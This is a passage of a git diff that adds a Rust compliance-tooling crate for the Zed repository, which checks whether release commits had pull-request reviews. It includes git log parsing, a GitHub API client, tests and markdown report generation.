assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn commit_without_pr_number_is_no_pr_found() { + let result = TestScenario::single_commit() + .with_commit(make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing without PR number", + "", + )) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::NoPullRequestFound))); + } + + #[tokio::test] + async fn pr_review_takes_precedence_over_comment() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Approved)]) + .with_comments(vec![comment("charlie", "@zed-zippy approve")]) + .with_org_members(vec!["bob", "charlie"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::PullRequestReviewed(_)))); + } + + #[tokio::test] + async fn comment_takes_precedence_over_co_author() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "@zed-zippy approve")]) + .with_commit_authors_json(serde_json::json!({ + "abc12345abc12345": { + "author": { + "name": "Alice", + "email": "alice@test.com", + "user": { "login": "alice" } + }, + "authors": [{ + "name": "Charlie", + "email": "charlie@test.com", + "user": { "login": "charlie" } + }] + } + })) + .with_commit(make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing (#1234)", + "Co-authored-by: Charlie ", + )) + .with_org_members(vec!["bob", "charlie"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::ApprovingComment(_)))); + } + + #[tokio::test] + async fn co_author_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_commit_authors_json(serde_json::json!({ + "abc12345abc12345": { + "author": { + "name": "Alice", + "email": "alice@test.com", + "user": { "login": "alice" } + }, + "authors": [{ + "name": "Bob", + "email": "bob@test.com", + "user": { "login": "bob" } + }] + } + })) + .with_commit(make_commit( + "abc12345abc12345", + "Alice", + 
"alice@test.com", + "Fix thing (#1234)", + "Co-authored-by: Bob ", + )) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::CoAuthored(_)))); + } + + #[tokio::test] + async fn no_reviews_no_comments_no_coauthors_is_unreviewed() { + let result = TestScenario::single_commit().run_scenario().await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } +} diff --git a/tooling/compliance/src/git.rs b/tooling/compliance/src/git.rs new file mode 100644 index 0000000000000000000000000000000000000000..fa2cb725712de82526d4ce717c2ec3dc97d22885 --- /dev/null +++ b/tooling/compliance/src/git.rs @@ -0,0 +1,591 @@ +#![allow(clippy::disallowed_methods, reason = "This is only used in xtasks")] +use std::{ + fmt::{self, Debug}, + ops::Not, + process::Command, + str::FromStr, + sync::LazyLock, +}; + +use anyhow::{Context, Result, anyhow}; +use derive_more::{Deref, DerefMut, FromStr}; + +use itertools::Itertools; +use regex::Regex; +use semver::Version; +use serde::Deserialize; + +pub trait Subcommand { + type ParsedOutput: FromStr; + + fn args(&self) -> impl IntoIterator; +} + +#[derive(Deref, DerefMut)] +pub struct GitCommand { + #[deref] + #[deref_mut] + subcommand: G, +} + +impl GitCommand { + #[must_use] + pub fn run(subcommand: G) -> Result { + Self { subcommand }.run_impl() + } + + fn run_impl(self) -> Result { + let command_output = Command::new("git") + .args(self.subcommand.args()) + .output() + .context("Failed to spawn command")?; + + if command_output.status.success() { + String::from_utf8(command_output.stdout) + .map_err(|_| anyhow!("Invalid UTF8")) + .and_then(|s| { + G::ParsedOutput::from_str(s.trim()) + .map_err(|e| anyhow!("Failed to parse from string: {e:?}")) + }) + } else { + anyhow::bail!( + "Command failed with exit code {}, stderr: {}", + command_output.status.code().unwrap_or_default(), + String::from_utf8(command_output.stderr).unwrap_or_default() + ) + } + } +} + +#[derive(Copy, Clone, Debug, 
PartialEq, Eq, PartialOrd, Ord)] +pub enum ReleaseChannel { + Stable, + Preview, +} + +impl ReleaseChannel { + pub(crate) fn tag_suffix(&self) -> &'static str { + match self { + ReleaseChannel::Stable => "", + ReleaseChannel::Preview => "-pre", + } + } +} + +#[derive(Debug, Clone)] +pub struct VersionTag(Version, ReleaseChannel); + +impl VersionTag { + pub fn parse(input: &str) -> Result { + // Being a bit more lenient for human inputs + let version = input.strip_prefix('v').unwrap_or(input); + + let (version_str, channel) = version + .strip_suffix("-pre") + .map_or((version, ReleaseChannel::Stable), |version_str| { + (version_str, ReleaseChannel::Preview) + }); + + Version::parse(version_str) + .map(|version| Self(version, channel)) + .map_err(|_| anyhow::anyhow!("Failed to parse version from tag!")) + } + + pub fn version(&self) -> &Version { + &self.0 + } +} + +impl ToString for VersionTag { + fn to_string(&self) -> String { + format!( + "v{version}{channel_suffix}", + version = self.0, + channel_suffix = self.1.tag_suffix() + ) + } +} + +#[derive(Debug, Deref, FromStr, PartialEq, Eq, Hash, Deserialize)] +pub struct CommitSha(pub(crate) String); + +impl CommitSha { + pub fn short(&self) -> &str { + self.0.as_str().split_at(8).0 + } +} + +#[derive(Debug)] +pub struct CommitDetails { + sha: CommitSha, + author: Committer, + title: String, + body: String, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Committer { + name: String, + email: String, +} + +impl Committer { + pub fn new(name: &str, email: &str) -> Self { + Self { + name: name.to_owned(), + email: email.to_owned(), + } + } +} + +impl fmt::Display for Committer { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + write!(formatter, "{} ({})", self.name, self.email) + } +} + +impl CommitDetails { + const BODY_DELIMITER: &str = "|body-delimiter|"; + const COMMIT_DELIMITER: &str = "|commit-delimiter|"; + const FIELD_DELIMITER: &str = "|field-delimiter|"; + const FORMAT_STRING: 
&str = "%H|field-delimiter|%an|field-delimiter|%ae|field-delimiter|%s|body-delimiter|%b|commit-delimiter|"; + + fn parse(line: &str, body: &str) -> Result { + let Some([sha, author_name, author_email, title]) = + line.splitn(4, Self::FIELD_DELIMITER).collect_array() + else { + return Err(anyhow!("Failed to parse commit fields from input {line}")); + }; + + Ok(CommitDetails { + sha: CommitSha(sha.to_owned()), + author: Committer::new(author_name, author_email), + title: title.to_owned(), + body: body.to_owned(), + }) + } + + pub fn pr_number(&self) -> Option { + // Since we use squash merge, all commit titles end with the '(#12345)' pattern. + // While we could strictly speaking index into this directly, go for a slightly + // less prone approach to errors + const PATTERN: &str = " (#"; + self.title + .rfind(PATTERN) + .and_then(|location| { + self.title[location..] + .find(')') + .map(|relative_end| location + PATTERN.len()..location + relative_end) + }) + .and_then(|range| self.title[range].parse().ok()) + } + + pub(crate) fn co_authors(&self) -> Option> { + static CO_AUTHOR_REGEX: LazyLock = + LazyLock::new(|| Regex::new(r"Co-authored-by: (.+) <(.+)>").unwrap()); + + let mut co_authors = Vec::new(); + + for cap in CO_AUTHOR_REGEX.captures_iter(&self.body.as_ref()) { + let Some((name, email)) = cap + .get(1) + .map(|m| m.as_str()) + .zip(cap.get(2).map(|m| m.as_str())) + else { + continue; + }; + co_authors.push(Committer::new(name, email)); + } + + co_authors.is_empty().not().then_some(co_authors) + } + + pub(crate) fn author(&self) -> &Committer { + &self.author + } + + pub(crate) fn title(&self) -> &str { + &self.title + } + + pub(crate) fn sha(&self) -> &CommitSha { + &self.sha + } +} + +#[derive(Debug, Deref, Default, DerefMut)] +pub struct CommitList(Vec); + +impl CommitList { + pub fn range(&self) -> Option { + self.0 + .first() + .zip(self.0.last()) + .map(|(first, last)| format!("{}..{}", first.sha().0, last.sha().0)) + } +} + +impl IntoIterator for 
CommitList { + type IntoIter = std::vec::IntoIter; + type Item = CommitDetails; + + fn into_iter(self) -> std::vec::IntoIter { + self.0.into_iter() + } +} + +impl FromStr for CommitList { + type Err = anyhow::Error; + + fn from_str(input: &str) -> Result { + Ok(CommitList( + input + .split(CommitDetails::COMMIT_DELIMITER) + .filter(|commit_details| !commit_details.is_empty()) + .map(|commit_details| { + let (line, body) = commit_details + .trim() + .split_once(CommitDetails::BODY_DELIMITER) + .expect("Missing body delimiter"); + CommitDetails::parse(line, body) + .expect("Parsing from the output should succeed") + }) + .collect(), + )) + } +} + +pub struct GetVersionTags; + +impl Subcommand for GetVersionTags { + type ParsedOutput = VersionTagList; + + fn args(&self) -> impl IntoIterator { + ["tag", "-l", "v*"].map(ToOwned::to_owned) + } +} + +pub struct VersionTagList(Vec); + +impl VersionTagList { + pub fn sorted(mut self) -> Self { + self.0.sort_by(|a, b| a.version().cmp(b.version())); + self + } + + pub fn find_previous_minor_version(&self, version_tag: &VersionTag) -> Option<&VersionTag> { + self.0 + .iter() + .take_while(|tag| tag.version() < version_tag.version()) + .collect_vec() + .into_iter() + .rev() + .find(|tag| { + (tag.version().major < version_tag.version().major + || (tag.version().major == version_tag.version().major + && tag.version().minor < version_tag.version().minor)) + && tag.version().patch == 0 + }) + } +} + +impl FromStr for VersionTagList { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let version_tags = s.lines().flat_map(VersionTag::parse).collect_vec(); + + version_tags + .is_empty() + .not() + .then_some(Self(version_tags)) + .ok_or_else(|| anyhow::anyhow!("No version tags found")) + } +} + +pub struct CommitsFromVersionToHead { + version_tag: VersionTag, + branch: String, +} + +impl CommitsFromVersionToHead { + pub fn new(version_tag: VersionTag, branch: String) -> Self { + Self { + version_tag, + branch, + } + 
} +} + +impl Subcommand for CommitsFromVersionToHead { + type ParsedOutput = CommitList; + + fn args(&self) -> impl IntoIterator { + [ + "log".to_string(), + format!("--pretty=format:{}", CommitDetails::FORMAT_STRING), + format!( + "{version}..{branch}", + version = self.version_tag.to_string(), + branch = self.branch + ), + ] + } +} + +pub struct NoOutput; + +impl FromStr for NoOutput { + type Err = anyhow::Error; + + fn from_str(_: &str) -> Result { + Ok(NoOutput) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn parse_stable_version_tag() { + let tag = VersionTag::parse("v0.172.8").unwrap(); + assert_eq!(tag.version().major, 0); + assert_eq!(tag.version().minor, 172); + assert_eq!(tag.version().patch, 8); + assert_eq!(tag.1, ReleaseChannel::Stable); + } + + #[test] + fn parse_preview_version_tag() { + let tag = VersionTag::parse("v0.172.1-pre").unwrap(); + assert_eq!(tag.version().major, 0); + assert_eq!(tag.version().minor, 172); + assert_eq!(tag.version().patch, 1); + assert_eq!(tag.1, ReleaseChannel::Preview); + } + + #[test] + fn parse_version_tag_without_v_prefix() { + let tag = VersionTag::parse("0.172.8").unwrap(); + assert_eq!(tag.version().major, 0); + assert_eq!(tag.version().minor, 172); + assert_eq!(tag.version().patch, 8); + } + + #[test] + fn parse_invalid_version_tag() { + let result = VersionTag::parse("vConradTest"); + assert!(result.is_err()); + } + + #[test] + fn version_tag_stable_roundtrip() { + let tag = VersionTag::parse("v0.172.8").unwrap(); + assert_eq!(tag.to_string(), "v0.172.8"); + } + + #[test] + fn version_tag_preview_roundtrip() { + let tag = VersionTag::parse("v0.172.1-pre").unwrap(); + assert_eq!(tag.to_string(), "v0.172.1-pre"); + } + + #[test] + fn sorted_orders_by_semver() { + let input = indoc! 
{" + v0.172.8 + v0.170.1 + v0.171.4 + v0.170.2 + v0.172.11 + v0.171.3 + v0.172.9 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + for window in list.0.windows(2) { + assert!( + window[0].version() <= window[1].version(), + "{} should come before {}", + window[0].to_string(), + window[1].to_string() + ); + } + assert_eq!(list.0[0].to_string(), "v0.170.1"); + assert_eq!(list.0[list.0.len() - 1].to_string(), "v0.172.11"); + } + + #[test] + fn find_previous_minor_for_173_returns_172() { + let input = indoc! {" + v0.170.1 + v0.170.2 + v0.171.3 + v0.171.4 + v0.172.0 + v0.172.8 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v0.173.0").unwrap(); + let previous = list.find_previous_minor_version(&target).unwrap(); + assert_eq!(previous.version().major, 0); + assert_eq!(previous.version().minor, 172); + assert_eq!(previous.version().patch, 0); + } + + #[test] + fn find_previous_minor_skips_same_minor() { + let input = indoc! {" + v0.172.8 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v0.172.8").unwrap(); + assert!(list.find_previous_minor_version(&target).is_none()); + } + + #[test] + fn find_previous_minor_with_major_version_gap() { + let input = indoc! {" + v0.172.0 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v1.0.0").unwrap(); + let previous = list.find_previous_minor_version(&target).unwrap(); + assert_eq!(previous.to_string(), "v0.172.0"); + } + + #[test] + fn find_previous_minor_requires_zero_patch_version() { + let input = indoc! 
{" + v0.172.1 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v1.0.0").unwrap(); + assert!(list.find_previous_minor_version(&target).is_none()); + } + + #[test] + fn parse_tag_list_from_real_tags() { + let input = indoc! {" + v0.9999-temporary + vConradTest + v0.172.8 + "}; + let list = VersionTagList::from_str(input).unwrap(); + assert_eq!(list.0.len(), 1); + assert_eq!(list.0[0].to_string(), "v0.172.8"); + } + + #[test] + fn parse_empty_tag_list_fails() { + let result = VersionTagList::from_str(""); + assert!(result.is_err()); + } + + #[test] + fn pr_number_from_squash_merge_title() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Add cool feature (#12345)", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert_eq!(commit.pr_number(), Some(12345)); + } + + #[test] + fn pr_number_missing() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Some commit without PR ref", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert_eq!(commit.pr_number(), None); + } + + #[test] + fn pr_number_takes_last_match() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Fix (#123) and refactor (#456)", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert_eq!(commit.pr_number(), Some(456)); + } + + #[test] + fn co_authors_parsed_from_body() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Some title", + d = CommitDetails::FIELD_DELIMITER + ); + let body = indoc! 
{" + Co-authored-by: Alice Smith + Co-authored-by: Bob Jones + "}; + let commit = CommitDetails::parse(&line, body).unwrap(); + let co_authors = commit.co_authors().unwrap(); + assert_eq!(co_authors.len(), 2); + assert_eq!( + co_authors[0], + Committer::new("Alice Smith", "alice@example.com") + ); + assert_eq!( + co_authors[1], + Committer::new("Bob Jones", "bob@example.com") + ); + } + + #[test] + fn no_co_authors_returns_none() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Some title", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert!(commit.co_authors().is_none()); + } + + #[test] + fn commit_sha_short_returns_first_8_chars() { + let sha = CommitSha("abcdef1234567890abcdef1234567890abcdef12".into()); + assert_eq!(sha.short(), "abcdef12"); + } + + #[test] + fn parse_commit_list_from_git_log_format() { + let fd = CommitDetails::FIELD_DELIMITER; + let bd = CommitDetails::BODY_DELIMITER; + let cd = CommitDetails::COMMIT_DELIMITER; + + let input = format!( + "sha111{fd}Alice{fd}alice@test.com{fd}First commit (#100){bd}First body{cd}sha222{fd}Bob{fd}bob@test.com{fd}Second commit (#200){bd}Second body{cd}" + ); + + let list = CommitList::from_str(&input).unwrap(); + assert_eq!(list.0.len(), 2); + + assert_eq!(list.0[0].sha().0, "sha111"); + assert_eq!( + list.0[0].author(), + &Committer::new("Alice", "alice@test.com") + ); + assert_eq!(list.0[0].title(), "First commit (#100)"); + assert_eq!(list.0[0].pr_number(), Some(100)); + assert_eq!(list.0[0].body, "First body"); + + assert_eq!(list.0[1].sha().0, "sha222"); + assert_eq!(list.0[1].author(), &Committer::new("Bob", "bob@test.com")); + assert_eq!(list.0[1].title(), "Second commit (#200)"); + assert_eq!(list.0[1].pr_number(), Some(200)); + assert_eq!(list.0[1].body, "Second body"); + } +} diff --git a/tooling/compliance/src/github.rs b/tooling/compliance/src/github.rs new file mode 100644 index 
0000000000000000000000000000000000000000..ebd2f2c75f5d0083632a8f70e3ea9dd2680d4eb5 --- /dev/null +++ b/tooling/compliance/src/github.rs @@ -0,0 +1,424 @@ +use std::{collections::HashMap, fmt, ops::Not, rc::Rc}; + +use anyhow::Result; +use derive_more::Deref; +use serde::Deserialize; + +use crate::git::CommitSha; + +pub const PR_REVIEW_LABEL: &str = "PR state:needs review"; + +#[derive(Debug, Clone)] +pub struct GitHubUser { + pub login: String, +} + +#[derive(Debug, Clone)] +pub struct PullRequestData { + pub number: u64, + pub user: Option, + pub merged_by: Option, +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum ReviewState { + Approved, + Other, +} + +#[derive(Debug, Clone)] +pub struct PullRequestReview { + pub user: Option, + pub state: Option, +} + +#[derive(Debug, Clone)] +pub struct PullRequestComment { + pub user: GitHubUser, + pub body: Option, +} + +#[derive(Debug, Deserialize, Clone, Deref, PartialEq, Eq)] +pub struct GithubLogin { + login: String, +} + +impl GithubLogin { + pub(crate) fn new(login: String) -> Self { + Self { login } + } +} + +impl fmt::Display for GithubLogin { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + write!(formatter, "@{}", self.login) + } +} + +#[derive(Debug, Deserialize, Clone)] +pub struct CommitAuthor { + name: String, + email: String, + user: Option, +} + +impl CommitAuthor { + pub(crate) fn user(&self) -> Option<&GithubLogin> { + self.user.as_ref() + } +} + +impl PartialEq for CommitAuthor { + fn eq(&self, other: &Self) -> bool { + self.user.as_ref().zip(other.user.as_ref()).map_or_else( + || self.email == other.email || self.name == other.name, + |(l, r)| l == r, + ) + } +} + +impl fmt::Display for CommitAuthor { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + match self.user.as_ref() { + Some(user) => write!(formatter, "{} ({user})", self.name), + None => write!(formatter, "{} ({})", self.name, self.email), + } + } +} + +#[derive(Debug, Deserialize)] +pub 
struct CommitAuthors { + #[serde(rename = "author")] + primary_author: CommitAuthor, + #[serde(rename = "authors")] + co_authors: Vec, +} + +impl CommitAuthors { + pub fn co_authors(&self) -> Option> { + self.co_authors.is_empty().not().then(|| { + self.co_authors + .iter() + .filter(|co_author| *co_author != &self.primary_author) + }) + } +} + +#[derive(Debug, Deserialize, Deref)] +pub struct AuthorsForCommits(HashMap); + +#[async_trait::async_trait(?Send)] +pub trait GitHubApiClient { + async fn get_pull_request(&self, pr_number: u64) -> Result; + async fn get_pull_request_reviews(&self, pr_number: u64) -> Result>; + async fn get_pull_request_comments(&self, pr_number: u64) -> Result>; + async fn get_commit_authors(&self, commit_shas: &[&CommitSha]) -> Result; + async fn check_org_membership(&self, login: &GithubLogin) -> Result; + async fn ensure_pull_request_has_label(&self, label: &str, pr_number: u64) -> Result<()>; +} + +pub struct GitHubClient { + api: Rc, +} + +impl GitHubClient { + pub fn new(api: Rc) -> Self { + Self { api } + } + + #[cfg(feature = "octo-client")] + pub async fn for_app(app_id: u64, app_private_key: &str) -> Result { + let client = OctocrabClient::new(app_id, app_private_key).await?; + Ok(Self::new(Rc::new(client))) + } + + pub async fn get_pull_request(&self, pr_number: u64) -> Result { + self.api.get_pull_request(pr_number).await + } + + pub async fn get_pull_request_reviews(&self, pr_number: u64) -> Result> { + self.api.get_pull_request_reviews(pr_number).await + } + + pub async fn get_pull_request_comments( + &self, + pr_number: u64, + ) -> Result> { + self.api.get_pull_request_comments(pr_number).await + } + + pub async fn get_commit_authors<'a>( + &self, + commit_shas: impl IntoIterator, + ) -> Result { + let shas: Vec<&CommitSha> = commit_shas.into_iter().collect(); + self.api.get_commit_authors(&shas).await + } + + pub async fn check_org_membership(&self, login: &GithubLogin) -> Result { + 
self.api.check_org_membership(login).await + } + + pub async fn add_label_to_pull_request(&self, label: &str, pr_number: u64) -> Result<()> { + self.api + .ensure_pull_request_has_label(label, pr_number) + .await + } +} + +#[cfg(feature = "octo-client")] +mod octo_client { + use anyhow::{Context, Result}; + use futures::TryStreamExt as _; + use itertools::Itertools; + use jsonwebtoken::EncodingKey; + use octocrab::{ + Octocrab, Page, models::pulls::ReviewState as OctocrabReviewState, + service::middleware::cache::mem::InMemoryCache, + }; + use serde::de::DeserializeOwned; + use tokio::pin; + + use crate::git::CommitSha; + + use super::{ + AuthorsForCommits, GitHubApiClient, GitHubUser, GithubLogin, PullRequestComment, + PullRequestData, PullRequestReview, ReviewState, + }; + + const PAGE_SIZE: u8 = 100; + const ORG: &str = "zed-industries"; + const REPO: &str = "zed"; + + pub struct OctocrabClient { + client: Octocrab, + } + + impl OctocrabClient { + pub async fn new(app_id: u64, app_private_key: &str) -> Result { + let octocrab = Octocrab::builder() + .cache(InMemoryCache::new()) + .app( + app_id.into(), + EncodingKey::from_rsa_pem(app_private_key.as_bytes())?, + ) + .build()?; + + let installations = octocrab + .apps() + .installations() + .send() + .await + .context("Failed to fetch installations")? + .take_items(); + + let installation_id = installations + .into_iter() + .find(|installation| installation.account.login == ORG) + .context("Could not find Zed repository in installations")? + .id; + + let client = octocrab.installation(installation_id)?; + Ok(Self { client }) + } + + fn build_co_authors_query<'a>(shas: impl IntoIterator) -> String { + const FRAGMENT: &str = r#" + ... 
on Commit { + author { + name + email + user { login } + } + authors(first: 10) { + nodes { + name + email + user { login } + } + } + } + "#; + + let objects: String = shas + .into_iter() + .map(|commit_sha| { + format!( + "commit{sha}: object(oid: \"{sha}\") {{ {FRAGMENT} }}", + sha = **commit_sha + ) + }) + .join("\n"); + + format!("{{ repository(owner: \"{ORG}\", name: \"{REPO}\") {{ {objects} }} }}") + .replace("\n", "") + } + + async fn graphql( + &self, + query: &serde_json::Value, + ) -> octocrab::Result { + self.client.graphql(query).await + } + + async fn get_all( + &self, + page: Page, + ) -> octocrab::Result> { + self.get_filtered(page, |_| true).await + } + + async fn get_filtered( + &self, + page: Page, + predicate: impl Fn(&T) -> bool, + ) -> octocrab::Result> { + let stream = page.into_stream(&self.client); + pin!(stream); + + let mut results = Vec::new(); + + while let Some(item) = stream.try_next().await? + && predicate(&item) + { + results.push(item); + } + + Ok(results) + } + } + + #[async_trait::async_trait(?Send)] + impl GitHubApiClient for OctocrabClient { + async fn get_pull_request(&self, pr_number: u64) -> Result { + let pr = self.client.pulls(ORG, REPO).get(pr_number).await?; + Ok(PullRequestData { + number: pr.number, + user: pr.user.map(|user| GitHubUser { login: user.login }), + merged_by: pr.merged_by.map(|user| GitHubUser { login: user.login }), + }) + } + + async fn get_pull_request_reviews(&self, pr_number: u64) -> Result> { + let page = self + .client + .pulls(ORG, REPO) + .list_reviews(pr_number) + .per_page(PAGE_SIZE) + .send() + .await?; + + let reviews = self.get_all(page).await?; + + Ok(reviews + .into_iter() + .map(|review| PullRequestReview { + user: review.user.map(|user| GitHubUser { login: user.login }), + state: review.state.map(|state| match state { + OctocrabReviewState::Approved => ReviewState::Approved, + _ => ReviewState::Other, + }), + }) + .collect()) + } + + async fn get_pull_request_comments( + &self, + 
pr_number: u64, + ) -> Result> { + let page = self + .client + .issues(ORG, REPO) + .list_comments(pr_number) + .per_page(PAGE_SIZE) + .send() + .await?; + + let comments = self.get_all(page).await?; + + Ok(comments + .into_iter() + .map(|comment| PullRequestComment { + user: GitHubUser { + login: comment.user.login, + }, + body: comment.body, + }) + .collect()) + } + + async fn get_commit_authors( + &self, + commit_shas: &[&CommitSha], + ) -> Result { + let query = Self::build_co_authors_query(commit_shas.iter().copied()); + let query = serde_json::json!({ "query": query }); + let mut response = self.graphql::(&query).await?; + + response + .get_mut("data") + .and_then(|data| data.get_mut("repository")) + .and_then(|repo| repo.as_object_mut()) + .ok_or_else(|| anyhow::anyhow!("Unexpected response format!")) + .and_then(|commit_data| { + let mut response_map = serde_json::Map::with_capacity(commit_data.len()); + + for (key, value) in commit_data.iter_mut() { + let key_without_prefix = key.strip_prefix("commit").unwrap_or(key); + if let Some(authors) = value.get_mut("authors") { + if let Some(nodes) = authors.get("nodes") { + *authors = nodes.clone(); + } + } + + response_map.insert(key_without_prefix.to_owned(), value.clone()); + } + + serde_json::from_value(serde_json::Value::Object(response_map)) + .context("Failed to deserialize commit authors") + }) + } + + async fn check_org_membership(&self, login: &GithubLogin) -> Result { + let page = self + .client + .orgs(ORG) + .list_members() + .per_page(PAGE_SIZE) + .send() + .await?; + + let members = self.get_all(page).await?; + + Ok(members + .into_iter() + .any(|member| member.login == login.as_str())) + } + + async fn ensure_pull_request_has_label(&self, label: &str, pr_number: u64) -> Result<()> { + if self + .get_filtered( + self.client + .issues(ORG, REPO) + .list_labels_for_issue(pr_number) + .per_page(PAGE_SIZE) + .send() + .await?, + |pr_label| pr_label.name == label, + ) + .await + .is_ok_and(|l| 
l.is_empty()) + { + self.client + .issues(ORG, REPO) + .add_labels(pr_number, &[label.to_owned()]) + .await?; + } + + Ok(()) + } + } +} + +#[cfg(feature = "octo-client")] +pub use octo_client::OctocrabClient; diff --git a/tooling/compliance/src/lib.rs b/tooling/compliance/src/lib.rs new file mode 100644 index 0000000000000000000000000000000000000000..9476412c6d6d1f56b1396bf5d700924549c707da --- /dev/null +++ b/tooling/compliance/src/lib.rs @@ -0,0 +1,4 @@ +pub mod checks; +pub mod git; +pub mod github; +pub mod report; diff --git a/tooling/compliance/src/report.rs b/tooling/compliance/src/report.rs new file mode 100644 index 0000000000000000000000000000000000000000..16df145394726b97382884fbdfdc3164c0029786 --- /dev/null +++ b/tooling/compliance/src/report.rs @@ -0,0 +1,446 @@ +use std::{ + fs::{self, File}, + io::{BufWriter, Write}, + path::Path, +}; + +use anyhow::Context as _; +use derive_more::Display; +use itertools::{Either, Itertools}; + +use crate::{ + checks::{ReviewFailure, ReviewResult, ReviewSuccess}, + git::CommitDetails, +}; + +const PULL_REQUEST_BASE_URL: &str = "https://github.com/zed-industries/zed/pull"; + +#[derive(Debug)] +pub struct ReportEntry { + pub commit: CommitDetails, + reason: R, +} + +impl ReportEntry { + fn commit_cell(&self) -> String { + let title = escape_markdown_link_text(self.commit.title()); + + match self.commit.pr_number() { + Some(pr_number) => format!("[{title}]({PULL_REQUEST_BASE_URL}/{pr_number})"), + None => escape_markdown_table_text(self.commit.title()), + } + } + + fn pull_request_cell(&self) -> String { + self.commit + .pr_number() + .map(|pr_number| format!("#{pr_number}")) + .unwrap_or_else(|| "—".to_owned()) + } + + fn author_cell(&self) -> String { + escape_markdown_table_text(&self.commit.author().to_string()) + } + + fn reason_cell(&self) -> String { + escape_markdown_table_text(&self.reason.to_string()) + } +} + +impl ReportEntry { + fn issue_kind(&self) -> IssueKind { + match self.reason { + 
ReviewFailure::Other(_) => IssueKind::Error, + _ => IssueKind::NotReviewed, + } + } +} + +impl ReportEntry { + fn reviewers_cell(&self) -> String { + match &self.reason.reviewers() { + Ok(reviewers) => escape_markdown_table_text(&reviewers), + Err(_) => "—".to_owned(), + } + } +} + +#[derive(Debug, Default)] +pub struct ReportSummary { + pub pull_requests: usize, + pub reviewed: usize, + pub not_reviewed: usize, + pub errors: usize, +} + +pub enum ReportReviewSummary { + MissingReviews, + MissingReviewsWithErrors, + NoIssuesFound, +} + +impl ReportSummary { + fn from_entries(entries: &[ReportEntry]) -> Self { + Self { + pull_requests: entries + .iter() + .filter_map(|entry| entry.commit.pr_number()) + .unique() + .count(), + reviewed: entries.iter().filter(|entry| entry.reason.is_ok()).count(), + not_reviewed: entries + .iter() + .filter(|entry| { + matches!( + entry.reason, + Err(ReviewFailure::NoPullRequestFound | ReviewFailure::Unreviewed) + ) + }) + .count(), + errors: entries + .iter() + .filter(|entry| matches!(entry.reason, Err(ReviewFailure::Other(_)))) + .count(), + } + } + + pub fn review_summary(&self) -> ReportReviewSummary { + match self.not_reviewed { + 0 if self.errors == 0 => ReportReviewSummary::NoIssuesFound, + 1.. 
if self.errors == 0 => ReportReviewSummary::MissingReviews, + _ => ReportReviewSummary::MissingReviewsWithErrors, + } + } + + fn has_errors(&self) -> bool { + self.errors > 0 + } +} + +#[derive(Clone, Copy, Debug, Display, PartialEq, Eq, PartialOrd, Ord)] +enum IssueKind { + #[display("Error")] + Error, + #[display("Not reviewed")] + NotReviewed, +} + +#[derive(Debug, Default)] +pub struct Report { + entries: Vec>, +} + +impl Report { + pub fn new() -> Self { + Self::default() + } + + pub fn add(&mut self, commit: CommitDetails, result: ReviewResult) { + self.entries.push(ReportEntry { + commit, + reason: result, + }); + } + + pub fn errors(&self) -> impl Iterator> { + self.entries.iter().filter(|entry| entry.reason.is_err()) + } + + pub fn summary(&self) -> ReportSummary { + ReportSummary::from_entries(&self.entries) + } + + pub fn write_markdown(self, path: impl AsRef) -> anyhow::Result<()> { + let path = path.as_ref(); + + if let Some(parent) = path + .parent() + .filter(|parent| !parent.as_os_str().is_empty()) + { + fs::create_dir_all(parent).with_context(|| { + format!( + "Failed to create parent directory for markdown report at {}", + path.display() + ) + })?; + } + + let summary = self.summary(); + let (successes, mut issues): (Vec<_>, Vec<_>) = + self.entries + .into_iter() + .partition_map(|entry| match entry.reason { + Ok(success) => Either::Left(ReportEntry { + reason: success, + commit: entry.commit, + }), + Err(fail) => Either::Right(ReportEntry { + reason: fail, + commit: entry.commit, + }), + }); + + issues.sort_by_key(|entry| entry.issue_kind()); + + let file = File::create(path) + .with_context(|| format!("Failed to create markdown report at {}", path.display()))?; + let mut writer = BufWriter::new(file); + + writeln!(writer, "# Compliance report")?; + writeln!(writer)?; + writeln!(writer, "## Overview")?; + writeln!(writer)?; + writeln!(writer, "- PRs: {}", summary.pull_requests)?; + writeln!(writer, "- Reviewed: {}", summary.reviewed)?; + 
